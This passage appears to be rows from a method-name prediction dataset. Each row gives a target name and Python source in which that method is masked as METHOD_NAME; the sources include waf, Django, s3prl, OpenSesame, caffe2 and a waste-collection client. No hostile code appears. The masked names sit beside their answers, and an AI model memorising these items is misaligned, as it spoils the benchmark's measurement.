        return super(self.derived_gccdeps, self).sig_implicit_deps()
    try:
        return Task.Task.sig_implicit_deps(self)
    except Errors.WafError:
        return Utils.SIG_NIL
def wrap_compiled_task(classname):
    """Derive a gccdeps-aware subclass of the named task class, overriding
    the scan/post_run/signature hooks with the .d-file based versions."""
    base = Task.classes[classname]
    derived = type(classname, (base,), {})
    # Each derived class remembers itself so the overrides can call the
    # proper super() implementation when gccdeps is disabled.
    derived.derived_gccdeps = derived
    derived.post_run = post_run
    derived.scan = scan
    derived.sig_implicit_deps = sig_implicit_deps
# Wrap the c/cxx compile task classes that are registered at load time.
for k in ('c', 'cxx'):
    if k in Task.classes:
        wrap_compiled_task(k)
@before_method('process_source')
@feature('force_gccdeps')
def force_gccdeps(self):
    # Used by the configuration tests in configure() below to enable the
    # gccdeps overrides unconditionally for the probe compilation.
    self.env.ENABLE_GCCDEPS = ['c', 'cxx']
def configure(conf):
    """Probe whether the C/C++ compilers accept the -MD/-MMD flags and, when
    they do, append the flags and enable gccdeps for that language."""
    # in case someone provides a --enable-gccdeps command-line option
    if not getattr(conf.options, 'enable_gccdeps', True):
        return

    global gccdeps_flags
    flags = conf.env.GCCDEPS_FLAGS or gccdeps_flags
    if conf.env.CC_NAME in supported_compilers:
        try:
            conf.check(fragment='int main() { return 0; }', features='c force_gccdeps', cflags=flags, msg='Checking for c flags %r' % ''.join(flags))
        except Errors.ConfigurationError:
            # Compiler rejected the flags: leave gccdeps disabled for C.
            pass
        else:
            conf.env.append_value('CFLAGS', flags)
            conf.env.append_unique('ENABLE_GCCDEPS', 'c')

    if conf.env.CXX_NAME in supported_compilers:
        try:
            conf.check(fragment='int main() { return 0; }', features='cxx force_gccdeps', cxxflags=flags, msg='Checking for cxx flags %r' % ''.join(flags))
        except Errors.ConfigurationError:
            # Same best-effort behaviour for C++.
            pass
        else:
            conf.env.append_value('CXXFLAGS', flags)
            conf.env.append_unique('ENABLE_GCCDEPS', 'cxx')
def options(opt):
    # This tool defines no command-line options; loading it during the
    # options phase is a usage error — load it from configure() instead.
    raise ValueError('Do not load gccdeps options')
|
298,462 | finalize job | import os
import logging
import mistune
import toml
from django.conf import settings
from django.db.models.signals import post_save
from django.dispatch import receiver
from biostar.recipes.models import Project, Access, Analysis, Job, Data
from biostar.recipes import util, auth
logger = logging.getLogger("engine")

__CURRENT_DIR = os.path.abspath(os.path.dirname(__file__))
# Bundled starter-recipe assets (starter.hjson/.sh/.png) live next to this module.
DATA_DIR = os.path.join(__CURRENT_DIR, 'recipes')
def join(*parts):
    """Shorthand for os.path.join."""
    return os.path.join(*parts)
@receiver(post_save, sender=Project)
def update_access(sender, instance, created, raw, update_fields, **kwargs):
    """Post-save hook: ensure the project owner always holds WRITE access."""
    # Give the owner WRITE ACCESS if they do not have it.
    entry = Access.objects.filter(user=instance.owner, project=instance, access=Access.WRITE_ACCESS)
    if entry.first() is None:
        entry = Access.objects.create(user=instance.owner, project=instance, access=Access.WRITE_ACCESS)
def strip_json(json_text):
    """
    Strip the 'settings' parameter in json_text down to its execute/create
    options; delete 'settings' entirely when neither is present.

    Returns the re-serialized text, or the input unchanged when it does not
    parse (best-effort: a bad recipe must not break the save).
    """
    try:
        local_dict = toml.loads(json_text)
    except Exception as exep:
        logger.error(f'Error loading json text: {exep}, {json_text}')
        return json_text

    # Fetch the execute and data-creation options, if any.
    execute_options = local_dict.get('settings', {}).get('execute', {})
    data_options = local_dict.get('settings', {}).get('create', {})

    if execute_options or data_options:
        # Strip run settings of everything but the execute/create options.
        local_dict['settings'] = dict(execute=execute_options, create=data_options)
    else:
        # No relevant options: drop 'settings' entirely. pop() is a no-op when
        # the key is absent, replacing the old assign-then-del sequence whose
        # assignment was dead code.
        local_dict.pop('settings', None)

    return toml.dumps(local_dict)
def initial_recipe(project):
    """Create the starter 'hello world' recipe for a new project."""
    # Add starter hello world recipe to project.
    try:
        json_text = open(join(DATA_DIR, 'starter.hjson'), 'r').read()
        template = open(join(DATA_DIR, 'starter.sh'), 'r').read()
        image = os.path.join(DATA_DIR, 'starter.png')
        image_stream = open(image, 'rb')
    except Exception as exc:
        # Bundled assets missing: fall back to a minimal inline recipe.
        logger.error(f'{exc}')
        json_text = ''
        template = "echo 'Hello World'"
        image_stream = None

    name = 'First recipe'
    text = "This recipe was created automatically."

    # Create starter recipe.
    recipe = auth.create_analysis(project=project, json_text=json_text, template=template,
                                  name=name, text=text, stream=image_stream, security=Analysis.AUTHORIZED)
    return recipe
@receiver(post_save, sender=Project)
def finalize_project(sender, instance, created, raw, update_fields, **kwargs):
    """Post-save hook: initialise uid/dir/rank for new projects and cascade
    the deleted flag to the project's recipes, data and jobs."""
    if created:
        # Generate friendly uid
        uid = auth.new_uid(obj=instance, objtype=Project, prefix="project")
        instance.uid = uid

        # Set the project directory
        instance.dir = instance.dir or join(settings.MEDIA_ROOT, "projects", f"{instance.uid}")

        # Get project with highest rank and add to it,
        # ensuring this new project is at the top of lists
        first = Project.objects.order_by('-rank').first()
        instance.rank = first.rank + instance.pk if first else instance.pk

        # Create the project directory if it does not exist.
        os.makedirs(instance.dir, exist_ok=True)

        # Update project fields via a queryset update (does not re-fire this
        # post_save signal).
        Project.objects.filter(id=instance.id).update(uid=instance.uid, dir=instance.dir, rank=instance.rank)

        # Create a starter recipe if none exist.
        if not instance.analysis_set.exists():
            initial_recipe(project=instance)

    # Cascade deleted states to recipe, data, and results.
    if instance.deleted:
        Analysis.objects.filter(project__id=instance.pk).update(deleted=True)
        Data.objects.filter(project__id=instance.pk).update(deleted=True)
        Job.objects.filter(project__id=instance.pk).update(deleted=True)
@receiver(post_save, sender=Analysis)
def finalize_recipe(sender, instance, created, raw, update_fields, **kwargs):
    """Post-save hook for recipes: uid/rank setup plus project bookkeeping."""
    if created:
        # Generate friendly uid
        uid = auth.new_uid(obj=instance, objtype=Analysis, prefix="recipe")
        instance.uid = uid
        Analysis.objects.filter(id=instance.id).update(uid=instance.uid)

        # Get recipe with highest rank and add to it,
        # ensuring this new recipe is at the top of lists.
        # NOTE(review): rank is set on the in-memory instance only — no
        # queryset update persists it here; confirm this is intentional.
        first = Analysis.objects.order_by('-rank').first()
        instance.rank = first.rank + instance.pk if first else instance.pk

    # Update the last edit date and user of project
    user = instance.lastedit_user

    # Strip json text of 'settings' parameter
    instance.json_text = strip_json(instance.json_text)

    Project.objects.filter(id=instance.project.id).update(lastedit_date=instance.lastedit_date,
                                                          lastedit_user=user)

    # Update information of all children belonging to this root.
    if instance.is_root:
        instance.update_children()

    # Update the project count and last edit date when a recipe changes.
    instance.project.set_counts()
@receiver(post_save, sender=Job)
def METHOD_NAME(sender, instance, created, raw, update_fields, **kwargs):
    """Post-save hook for jobs: refresh project counts and initialise the
    uid and working directory of newly created jobs."""
    # Update the project count.
    instance.project.set_counts()
    if created:
        # Generate friendly uid
        uid = auth.new_uid(obj=instance, objtype=Job, prefix="job")
        instance.uid = uid
        # Generate the path based on the uid.
        instance.path = join(settings.MEDIA_ROOT, "jobs", f"{instance.uid}")
        # Create the job directory if it does not exist.
        os.makedirs(instance.path, exist_ok=True)
        # Persist via queryset update (does not re-fire this signal).
        Job.objects.filter(id=instance.id).update(uid=instance.uid, path=instance.path,
                                                  text=instance.text, html=instance.html)
@receiver(post_save, sender=Data)
def finalize_data(sender, instance, created, raw, update_fields, **kwargs):
    """Post-save hook for data objects: project bookkeeping plus uid, data
    directory and table-of-contents initialisation for new data."""
    # Update the projects last edit user when a data is uploaded
    Project.objects.filter(id=instance.project.id).update(lastedit_user=instance.lastedit_user,
                                                          lastedit_date=instance.lastedit_date)
    # Update the project count.
    instance.project.set_counts()

    if created:
        # Generate friendly uid
        uid = auth.new_uid(obj=instance, objtype=Data, prefix="data")
        instance.uid = uid

        # Set the data directory with the recently created uid
        instance.dir = join(instance.get_project_dir(), f"{instance.uid}")
        # Set the toc file with the recently created uid
        instance.toc = join(settings.TOC_ROOT, f"toc-{instance.uid}.txt")

        # Build the data directory.
        os.makedirs(instance.dir, exist_ok=True)

        # Create an empty table-of-contents file if it does not exist yet.
        if not os.path.isfile(instance.toc):
            with open(instance.toc, 'wt') as fp:
                pass

        # Persist the dir, toc, and uid via queryset update (avoids re-firing
        # this signal), then populate the table of contents.
        Data.objects.filter(id=instance.id).update(uid=instance.uid, dir=instance.dir, toc=instance.toc)
        instance.make_toc()
298,463 | set up test data | import doctest
from datetime import datetime
from django.test import TestCase, override_settings
from django.utils import timezone
from members import models
from members.models import Member, Profile
def load_tests(loader, tests, ignore):
    """Load doctests.

    Implements the unittest ``load_tests`` protocol: the (augmented) suite
    must be returned, otherwise the loader ends up with ``None`` instead of
    a test suite.
    """
    tests.addTests(doctest.DocTestSuite(models))
    return tests
@override_settings(SUSPEND_SIGNALS=True)
class MemberBirthdayTest(TestCase):
    """Tests for Member.current_members.with_birthdays_in_range."""

    fixtures = ["members.json"]

    def _make_date(self, date):
        # Parse 'YYYY-MM-DD' into an aware datetime in the current timezone.
        return timezone.make_aware(datetime.strptime(date, "%Y-%m-%d"))

    def _get_members(self, start, end):
        start_date = self._make_date(start)
        end_date = self._make_date(end)
        return Member.current_members.with_birthdays_in_range(start_date, end_date)

    def _assert_none(self, start, end):
        # Expect no fixture member to have a birthday in [start, end].
        members = self._get_members(start, end)
        self.assertEqual(len(members), 0)

    def _assert_thom(self, start, end):
        # Expect exactly one fixture member (Thom Wiggers) in range.
        members = self._get_members(start, end)
        self.assertEqual(len(members), 1)
        self.assertEqual(members[0].get_full_name(), "Thom Wiggers")

    def test_one_year_contains_birthday(self):
        self._assert_thom("2016-03-02", "2016-08-08")

    def test_one_year_not_contains_birthday(self):
        self._assert_none("2016-01-01", "2016-02-01")

    def test_span_year_contains_birthday(self):
        self._assert_thom("2015-08-09", "2016-08-08")

    def test_span_year_not_contains_birthday(self):
        self._assert_none("2015-12-25", "2016-03-01")

    def test_span_multiple_years_contains_birthday(self):
        self._assert_thom("2012-12-31", "2016-01-01")

    def test_range_before_person_born(self):
        self._assert_none("1985-12-12", "1985-12-13")

    def test_person_born_in_range_in_one_year(self):
        self._assert_thom("1993-01-01", "1993-04-01")

    def test_person_born_in_range_spanning_one_year(self):
        self._assert_thom("1992-12-31", "1993-04-01")

    def test_person_born_in_range_spanning_multiple_years(self):
        self._assert_thom("1992-12-31", "1995-01-01")
@override_settings(SUSPEND_SIGNALS=True)
class MemberTest(TestCase):
    """Tests for the membership-history helpers on Member."""

    fixtures = ["members.json"]

    def test_has_been_member(self):
        member = Member.objects.get(pk=1)
        self.assertTrue(member.has_been_member())
        # Converting the only membership to honorary removes the member's
        # regular-membership history.
        m1 = member.membership_set.all()[0]
        m1.type = "honorary"
        m1.save()
        self.assertFalse(member.has_been_member())

    def test_has_been_honorary_member(self):
        member = Member.objects.get(pk=1)
        self.assertFalse(member.has_been_honorary_member())
        m1 = member.membership_set.all()[0]
        m1.type = "honorary"
        m1.save()
        self.assertTrue(member.has_been_honorary_member())
class MemberDisplayNameTest(TestCase):
    """Tests for Profile.display_name()/short_display_name() under each
    display_name_preference value."""

    @classmethod
    def METHOD_NAME(cls):
        # One member + profile shared (read-only) by all tests in the class.
        cls.member = Member.objects.create(
            username="johnnytest", first_name="", last_name=""
        )
        cls.profile = Profile.objects.create(
            user_id=cls.member.pk,
            initials=None,
            nickname=None,
            display_name_preference="full",
        )

    def setUp(self):
        # Reset the in-memory profile state before every test.
        self.profile.display_name_preference = "full"
        # Assuming we always have a first and last name
        self.profile.user.first_name = "Johnny"
        self.profile.user.last_name = "Test"
        self.profile.nickname = None
        self.profile.initials = None

    def test_check_display_name_full(self):
        self.assertEqual("Johnny Test", self.profile.display_name())
        self.assertEqual("Johnny", self.profile.short_display_name())

    def test_check_display_name_nickname(self):
        self.profile.display_name_preference = "nickname"
        # Without a nickname set, falls back to the full name.
        self.assertEqual("Johnny Test", self.profile.display_name())
        self.assertEqual("Johnny", self.profile.short_display_name())
        self.profile.nickname = "John"
        self.assertEqual("'John'", self.profile.display_name())
        self.assertEqual("'John'", self.profile.short_display_name())

    def test_check_display_name_firstname(self):
        self.profile.display_name_preference = "firstname"
        self.assertEqual("Johnny", self.profile.display_name())
        self.assertEqual("Johnny", self.profile.short_display_name())

    def test_check_display_name_initials(self):
        self.profile.display_name_preference = "initials"
        # Without initials set, only the last name is shown.
        self.assertEqual("Test", self.profile.display_name())
        self.assertEqual("Test", self.profile.short_display_name())
        self.profile.initials = "J"
        self.assertEqual("J Test", self.profile.display_name())
        self.assertEqual("J Test", self.profile.short_display_name())

    def test_check_display_name_fullnick(self):
        self.profile.display_name_preference = "fullnick"
        self.assertEqual("Johnny Test", self.profile.display_name())
        self.assertEqual("Johnny", self.profile.short_display_name())
        self.profile.nickname = "John"
        self.assertEqual("Johnny 'John' Test", self.profile.display_name())
        self.assertEqual("Johnny", self.profile.short_display_name())

    def test_check_display_name_nicklast(self):
        self.profile.display_name_preference = "nicklast"
        self.assertEqual("Johnny Test", self.profile.display_name())
        self.assertEqual("Johnny", self.profile.short_display_name())
        self.profile.nickname = "John"
        self.assertEqual("'John' Test", self.profile.display_name())
        self.assertEqual("'John'", self.profile.short_display_name())
298,464 | inference | import torch
from torch.nn import L1Loss
from s3prl.corpus.librispeech import librispeech_for_pretrain
from s3prl.dataset.pretrain_tera_pipe import PretrainTeraPipe
from s3prl.nn.predictor_mockingjay import PredictorMockingjay
from s3prl.nn.transformer_mockingjay import TransformerMockingjay
from s3prl.sampler import FixedBatchSizeBatchSampler, MaxTimestampBatchSampler
from s3prl.task import Task
from s3prl.task.feat_reconstruction_task import FeatReconstructionTask
from s3prl.util.configuration import override_parent_cfg
from s3prl.util.workspace import Workspace
from .base import SslProblem
# Log-mel feature dimensionality shared by the input pipeline, the upstream
# encoder's input module and the reconstruction target.
_input_size = 80

# Masked-acoustic-modeling (MAM) masking hyperparameters.
_mask_args = dict(
    position_encoding_size=768,  # int, this should be identical to `hidden_size`
    mask_proportion=0.15,  # float, mask this percentage of all spectrogram frames in each sequence at random during MAM training
    mask_consecutive_min=7,  # int, mask this amount of consecutive frames
    mask_consecutive_max=7,  # int, mask this amount of consecutive frames
    mask_allow_overlap=True,  # bool, allow overlap masking
    mask_bucket_ratio=1.5,  # float, only used when overlap is not allowed. sample a mask from each bucket in size of [sampled mask_consecutive * mask_bucket_ratio]
    mask_frequency=0.2,  # float, mask maximum this percentage of frequency bands, set to 0 for no frequency mask
)

_noise_args = dict(
    noise_proportion=0.0,  # float, for this percentage of the time, Gaussian noise will be applied on all frames during MAM training, set to 0 for no noise
)

# Acoustic feature extraction settings (log-mel input and target streams).
_audio_config = dict(
    win_ms=25,
    hop_ms=10,
    n_freq=201,
    n_mels=_input_size,
    n_mfcc=13,
    input={
        "channel": 0,
        "cmvn": True,
        "delta": 0,
        "feat_type": "mel",
        "log": True,
    },
    target={
        "channel": 1,
        "cmvn": True,
        "delta": 0,
        "feat_type": "mel",
        "log": True,
    },
)

# Full pre-training pipeline config: masking + noise + audio settings.
_pretrain_task_pipe_config = dict(
    _cls=PretrainTeraPipe,
    target_level=-25,
    **_mask_args,
    **_noise_args,
    **_audio_config,
)

# Transformer encoder hyperparameters shared by the upstream and predictor.
_transformer_config = dict(
    hidden_size=768,  # Size of the encoder layers and the pooler layer.
    num_hidden_layers=3,  # Number of hidden layers in the Transformer encoder.
    num_attention_heads=12,  # Number of attention heads for each attention layer in the Transformer encoder.
    intermediate_size=3072,  # The size of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
    hidden_act="gelu",  # The non-linear activation function (function or string) in the encoder and pooler. If string, "gelu", "relu" and "swish" are supported.
    hidden_dropout_prob=0.1,  # The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
    attention_probs_dropout_prob=0.1,  # The dropout ratio for the attention probabilities.
    initializer_range=0.02,  # The sttdev of the truncated_normal_initializer for initializing all weight matrices.
    layer_norm_eps=1.0e-12,  # The epsilon used by LayerNorm.
    share_layer=False,  # Share layer weights
    pre_layer_norm=False,  # To apply the pre layer normalization technique introduced in: https://arxiv.org/abs/2002.04745
)
class Tera(SslProblem):
    """
    Tera pre-train problem: wires the LibriSpeech corpus, the TERA masking
    pipeline, a Mockingjay transformer upstream and a reconstruction task
    into the SslProblem stage framework via config-override decorators.
    """

    @override_parent_cfg(
        corpus=dict(
            _cls=librispeech_for_pretrain,
            dataset_root="???",
        ),
        train_datapipe=_pretrain_task_pipe_config,
        train_sampler=dict(
            _cls=MaxTimestampBatchSampler,
            max_timestamp=16000 * 20,
            shuffle=True,
        ),
        valid_datapipe=_pretrain_task_pipe_config,
        valid_sampler=dict(
            _cls=FixedBatchSizeBatchSampler,
            batch_size=2,
        ),
        test_datapipe=_pretrain_task_pipe_config,
        test_sampler=dict(
            _cls=FixedBatchSizeBatchSampler,
            batch_size=2,
        ),
        upstream=dict(
            _cls=TransformerMockingjay,
            config=_transformer_config,
            input_dim=_input_size,
            output_attentions=False,
            keep_multihead_output=False,
            with_input_module=True,
        ),
        predictor=dict(
            _cls=PredictorMockingjay,
            config=_transformer_config,
            output_dim=_input_size,
            input_dim=None,  # automatically use `hidden_size` from `_transformer_config`
        ),
        task=dict(
            _cls=FeatReconstructionTask,
            loss=L1Loss,
        ),
    )
    @classmethod
    def setup_problem(cls, **cfg):
        """
        This setups the Tera problem, containing train/valid/test datasets & samplers and a task object
        """
        super().setup_problem(**cfg)

    @override_parent_cfg(
        optimizer=dict(
            _cls="torch.optim.AdamW",
            lr=2.0e-4,
        ),
        trainer=dict(
            total_steps=1000000,
            eval_step=50000,
            save_step=50000,
            gradient_clipping=5.0,
            gradient_accumulate_steps=4,
            valid_metric="loss",
            valid_higher_better=False,
        ),
    )
    @classmethod
    def train(cls, **cfg):
        """
        Train the setup problem with the train/valid datasets & samplers and the task object
        """
        super().train(**cfg)

    @override_parent_cfg()
    @classmethod
    def METHOD_NAME(cls, **cfg):
        """Run inference using the parent's default configuration."""
        super().METHOD_NAME(**cfg)

    @classmethod
    def save_additional(
        cls,
        additional_dir: Workspace,
        workspace: Workspace,
        task: Task,
    ):
        """Export a legacy s3prl-style checkpoint (all_states.ckpt) so the
        pretrained weights can be consumed by the upstream interface."""
        all_states = dict(
            Config={},  # placeholder
            SpecHead=task.predictor.state_dict(),
            Transformer=task.upstream.state_dict(),
            Upstream_Config=dict(
                transformer=_transformer_config,
                audio=_audio_config,
                task=dict(sequence_length=0),
            ),
        )
        # The audio config in the checkpoint must also carry the pipeline's
        # waveform normalization target level.
        all_states["Upstream_Config"]["audio"][
            "target_level"
        ] = _pretrain_task_pipe_config["target_level"]
        torch.save(
            all_states, str(additional_dir.parent.resolve()) + "/all_states.ckpt"
        )

    @override_parent_cfg(
        start_stage=0,
        final_stage=2,
        stage_0=dict(
            _method="setup_problem",
        ),
        stage_1=dict(
            _method="train",
        ),
        stage_2=dict(
            _method="inference",
        ),
    )
    @classmethod
    def run_stages(cls, **cfg):
        """Execute stages 0-2 in order: setup_problem -> train -> inference."""
        super().run_stages(**cfg)
298,465 | adjust pitch | # -*- coding:utf-8 -*-
"""
This file is part of OpenSesame.
OpenSesame is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenSesame is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenSesame. If not, see <http://www.gnu.org/licenses/>.
"""
from libopensesame.py3compat import *
from pygame.locals import *
import pygame
from openexp._sampler.sampler import Sampler
from libopensesame.exceptions import SoundFileDoesNotExist, \
UnsupportedSoundFileFormat, InvalidValue
from libopensesame.oslogging import oslogger
from libopensesame import misc
from openexp.keyboard import Keyboard
from openexp.backend import configurable
import os.path
# numpy is unavailable on some platforms (e.g. Android); the pitch/pan
# features below degrade to no-ops when it is missing.
# NOTE(review): the bare except also hides non-import failures — confirm
# narrowing to ImportError is safe before changing it.
try:
    import numpy
except:
    numpy = None
import pygame.mixer as mixer
class Legacy(Sampler):

    r"""This is a sampler backend built on top of PyGame. For function
    specifications and docstrings, see `openexp._sampler.sampler`.
    """

    # The settings variable is used by the GUI to provide a list of back-end
    # settings
    settings = {
        u"sound_buf_size": {
            u"name": u"Sound buffer size",
            u"description": u"Size of the sound buffer (increase if playback is choppy)",
            u"default": 1024
        },
        u"sound_freq": {
            u"name": u"Sampling frequency",
            u"description": u"Determines the sampling rate",
            u"default": 48000
        },
        u"sound_sample_size": {
            u"name": u"Sample size",
            u"description": u"Determines the bith depth (negative = signed)",
            u"default": -16
        },
        "sound_channels": {
            u"name": u"The number of sound channels",
            u"description": u"1 = mono, 2 = stereo",
            u"default": 2
        },
    }

    def __init__(self, experiment, src, **playback_args):
        # Validate and load the sound file before the base class applies the
        # playback arguments. Only .ogg and .wav sources are accepted.
        if src is not None:
            if isinstance(src, str):
                if not os.path.exists(src):
                    raise SoundFileDoesNotExist(src)
                if os.path.splitext(src)[1].lower() not in (".ogg", ".wav"):
                    raise UnsupportedSoundFileFormat(src)
            self.sound = mixer.Sound(src)
        Sampler.__init__(self, experiment, src, **playback_args)
        self.keyboard = Keyboard(experiment)

    def set_config(self, **cfg):
        # Normalise None to 0: "no duration limit" / "no fade-in" for PyGame.
        if u'duration' in cfg and cfg[u'duration'] is None:
            cfg[u'duration'] = 0
        if u'fade_in' in cfg and cfg[u'fade_in'] is None:
            cfg[u'fade_in'] = 0
        Sampler.set_config(self, **cfg)
        # Volume/pitch/pan changes are applied to the loaded sound directly.
        if u'volume' in cfg:
            self.sound.set_volume(cfg[u'volume'])
        if u'pitch' in cfg:
            self.METHOD_NAME(cfg[u'pitch'])
        if u'pan' in cfg:
            self.adjust_pan(cfg[u'pan'])

    def METHOD_NAME(self, p):
        """Change the pitch by resampling the raw sample buffer by factor *p*
        (values > 1 shorten/raise the sound, < 1 lengthen/lower it)."""
        # On Android, numpy does not exist and this is not supported
        if numpy is None:
            return
        if type(p) not in (int, float) or p <= 0:
            raise InvalidValue(f'pitch should be a positive number, not {p}')
        if p == 1:
            return
        # Nearest-neighbour resampling of the sample buffer.
        buf = pygame.sndarray.array(self.sound)
        _buf = []
        for i in range(int(float(len(buf)) / p)):
            _buf.append(buf[int(float(i) * p)])
        self.sound = pygame.sndarray.make_sound(
            numpy.array(_buf, dtype=u"int16"))

    def adjust_pan(self, p):
        """Pan the stereo buffer: negative values attenuate the right channel,
        positive the left; 'left'/'right' silence the opposite channel."""
        # On Android, numpy does not exist and this is not supported
        if numpy is None:
            return
        if type(p) not in (int, float) and p not in (u"left", u"right"):
            raise InvalidValue(
                f'pan should be a number, "left" or "right", not {p}')
        if p == 0:
            return
        buf = pygame.sndarray.array(self.sound)
        for i in range(len(buf)):
            l = buf[i][0]
            r = buf[i][1]
            if p == "left":
                r = 0
            elif p == "right":
                l = 0
            elif p < 0:
                r = int(float(r) / abs(p))
            else:
                l = int(float(l) / p)
            buf[i][0] = l
            buf[i][1] = r
        self.sound = pygame.sndarray.make_sound(numpy.array(buf))

    @configurable
    def play(self, **playback_args):
        self.sound.play(maxtime=self.duration, fade_ms=self.fade_in)
        if self.block:
            # Blocking playback: wait until the sound has finished.
            self.wait()

    def stop(self):
        mixer.stop()

    def pause(self):
        mixer.pause()

    def resume(self):
        mixer.unpause()

    def is_playing(self):
        return bool(mixer.get_busy())

    def wait(self):
        # Poll until playback ends, discarding queued key presses meanwhile.
        while mixer.get_busy():
            self.keyboard.flush()

    @staticmethod
    def init_sound(experiment):
        """(Re-)initialize the PyGame mixer with the experiment's settings."""
        oslogger.info(
            u"sampling freq = %d, buffer size = %d"
            % (experiment.var.sound_freq, experiment.var.sound_buf_size)
        )
        # A previously initialized mixer must be closed before pre_init takes
        # effect.
        if hasattr(mixer, u'get_init') and mixer.get_init():
            oslogger.warning(u'mixer already initialized, closing')
            pygame.mixer.quit()
        mixer.pre_init(
            experiment.var.sound_freq,
            experiment.var.sound_sample_size,
            experiment.var.sound_channels,
            experiment.var.sound_buf_size
        )
        try:
            mixer.init()
        except pygame.error:
            oslogger.error(u'failed to initialize mixer')

    @staticmethod
    def close_sound(experiment):
        mixer.quit()
# Non PEP-8 alias for backwards compatibility
legacy = Legacy |
298,466 | control flow |
import errno
import os
from subprocess import PIPE, Popen
import caffe2.python._import_c_extension as C
from caffe2.proto import caffe2_pb2
from caffe2.python import core
class NNModule:
    """Python wrapper around the nomnigraph ``NNModule`` C extension.

    Can be constructed empty, from a ``core.Net`` or ``caffe2_pb2.NetDef``
    proto, or — when *device_map* is given — as a distributed module.  Most
    methods delegate directly to the underlying C object.
    """
    def __init__(self, net=None, device_map=None):
        if net is not None:
            serialized_proto = None
            if isinstance(net, core.Net):
                serialized_proto = net.Proto().SerializeToString()
            elif isinstance(net, caffe2_pb2.NetDef):
                serialized_proto = net.SerializeToString()
            # Distributed
            if device_map is not None:
                serialized_device_map = {}
                for k in device_map:
                    serialized_device_map[k] = device_map[k].SerializeToString()
                self._NNModule = C.NNModuleFromProtobufDistributed(
                    serialized_proto, serialized_device_map
                )
            # Default
            elif serialized_proto:
                self._NNModule, self._OpList = C.NNModuleFromProtobuf(serialized_proto)
            else:
                raise Exception(
                    "NNModule can be constructed with core.Net or caffe2_pb2.NetDef types"
                )
        else:
            self._NNModule = C.NNModule()
    @property
    def dataFlow(self):
        """The module's dataflow graph, as returned by the C extension."""
        return self._NNModule.dataFlow()
    @property
    def METHOD_NAME(self):
        # Execution order as reported by the C extension.
        return self._NNModule.getExecutionOrder()
    @property
    def nodes(self):
        return self._NNModule.dataFlow().nodes
    @property
    def operators(self):
        return self._NNModule.dataFlow().operators
    @property
    def tensors(self):
        return self._NNModule.dataFlow().tensors
    def createNode(self, val):
        return self._NNModule.dataFlow().createNode(val)
    def deleteNode(self, node):
        return self._NNModule.dataFlow().deleteNode(node)
    def createEdge(self, a, b):
        return self._NNModule.dataFlow().createEdge(a, b)
    def deleteEdge(self, a, b=None):
        # Calls the one- or two-argument C overload depending on whether *b*
        # was supplied.
        if b:
            self._NNModule.dataFlow().deleteEdge(a, b)
        else:
            self._NNModule.dataFlow().deleteEdge(a)
    def replaceNode(self, old_node, new_node):
        return self._NNModule.dataFlow().replaceNode(old_node, new_node)
    def replaceProducer(self, tensor, new_producer):
        C.replaceProducer(tensor, new_producer)
    def replaceAllUsesWith(self, old_tensor, new_tensor):
        C.replaceAllUsesWith(old_tensor, new_tensor)
    def replaceAsConsumer(self, old_consumer, new_consumer):
        C.replaceAsConsumer(old_consumer, new_consumer)
    def replaceSubgraph(self, subgraph, new_node, inputs, outputs):
        self._NNModule.replaceSubgraph(subgraph, new_node, inputs, outputs)
    def deleteSubgraph(self, subgraph):
        self._NNModule.deleteSubgraph(subgraph)
    def createUniqueDataNode(self, prefix="_unique"):
        return self._NNModule.createUniqueDataNode(prefix)
    def convertToCaffe2Proto(self, old_proto=None):
        """Convert back into a ``caffe2_pb2.NetDef``, merging *old_proto* if given."""
        if not old_proto:
            old_proto = caffe2_pb2.NetDef()
        output = self._NNModule.convertToCaffe2Proto(old_proto)
        new_proto = caffe2_pb2.NetDef()
        new_proto.ParseFromString(output)
        return new_proto
    def match(self, pattern):
        """Yield every subgraph match of *pattern* over the dataflow nodes."""
        for n in self.dataFlow.getMutableNodes():
            m = C.matchSubgraph(n, pattern)
            if m:
                yield m
def render(s):
    """Pretty-print a graph description.

    If the ``graph-easy`` tool is available on PATH, the string form of *s*
    is piped through it for an ASCII rendering; otherwise the raw string is
    printed to stdout.

    :param s: graph description (converted with ``str``)
    """
    import shutil

    s = str(s)
    # shutil.which replaces the previous hand-rolled PATH/X_OK scan.
    if shutil.which("graph-easy"):
        p = Popen("graph-easy", stdin=PIPE)
        try:
            p.stdin.write(s.encode("utf-8"))
        except IOError as e:
            # graph-easy may exit early; ignore benign broken-pipe errors.
            if e.errno not in (errno.EPIPE, errno.EINVAL):
                # Raise any other error.
                raise
        p.stdin.close()
        p.wait()
    else:
        print(s)
# Short module-level aliases for the nomnigraph C-extension types.
NeuralNetOperator = C.NeuralNetOperator
Operator = C.NeuralNetOperator
NeuralNetData = C.NeuralNetData
Data = C.NeuralNetData
NNSubgraph = C.NNSubgraph
NNMatchGraph = C.NNMatchGraph
Graph = C.Graph
Annotation = C.Annotation
298,467 | use dedicated calendar | import datetime
import importlib
import logging
import traceback
from typing import Dict, List, Optional
from .collection import Collection
_LOGGER = logging.getLogger(__name__)
class Customize:
    """Customization settings for one waste collection type.

    :param waste_type: raw waste type name this customization applies to
    :param alias: display name overriding the raw waste type
    :param show: whether entries of this type are shown at all
    :param icon: icon override for matching entries
    :param picture: picture override for matching entries
    :param METHOD_NAME: if True, entries of this type get a dedicated calendar
    :param dedicated_calendar_title: title used for that dedicated calendar
    """

    def __init__(
        self,
        waste_type,
        alias=None,
        show=True,
        icon=None,
        picture=None,
        METHOD_NAME=False,
        dedicated_calendar_title=None,
    ):
        self._waste_type = waste_type
        self._alias = alias
        self._show = show
        self._icon = icon
        self._picture = picture
        self._use_dedicated_calendar = METHOD_NAME
        self._dedicated_calendar_title = dedicated_calendar_title

    @property
    def waste_type(self):
        return self._waste_type

    @property
    def alias(self):
        return self._alias

    @property
    def show(self):
        return self._show

    @property
    def icon(self):
        return self._icon

    @property
    def picture(self):
        return self._picture

    @property
    def METHOD_NAME(self):
        return self._use_dedicated_calendar

    @property
    def dedicated_calendar_title(self):
        return self._dedicated_calendar_title

    def __repr__(self):
        # Include *all* configurable fields (the dedicated-calendar pair was
        # previously missing) so debug output reflects the full state.
        return (
            f"Customize{{waste_type={self._waste_type}, alias={self._alias}, "
